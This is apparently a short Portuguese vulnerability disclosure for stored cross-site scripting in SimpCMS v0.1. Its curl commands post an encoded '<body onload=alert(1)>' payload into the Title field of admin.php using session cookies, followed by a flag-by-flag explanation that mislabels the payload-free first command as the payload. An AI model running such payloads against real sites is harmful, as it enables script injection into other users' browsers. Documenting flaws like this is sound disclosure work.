
Publicação para Cross Site Scripting (XSS) no SimpCMS v0.1 - /SimpCMS/admin.php
Uma vulnerabilidade de cross-site scripting (XSS) no SimpCMS v0.1 permite que atacantes executem scripts web arbitrários ou HTML por meio de um payload malicioso injetado no campo Title em /admin.php.
Após efetuar login na interface de administração do SimpCMS, copie seus respectivos valores de Cookie observados na aba Application do Inspect do navegador e envie a seguinte requisição curl:
curl -X POST "http://site.com/SimpCMS/admin/index.php" -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0"


Os parâmetros iniciais observados para o software SimpCMS resultaram no seguinte comando cURL, que foi posteriormente atualizado:
curl -X POST "http://site.com/SimpCMS/admin.php" -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit" -b "username=admin; password=PARAMVALUE"
Explicação:
- curl: A ferramenta de linha de comando para transferir dados com URLs.
- -X POST: Especifica o método de requisição a ser usado (POST).
- "http://site.com/SimpCMS/admin.php": A URL para a qual a requisição é enviada.
- -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0" - O payload da requisição POST.
Execute este comando no seu terminal para enviar a requisição POST com o payload de XSS. Acesse o site principal /SimpCMS e o XSS ficará visível.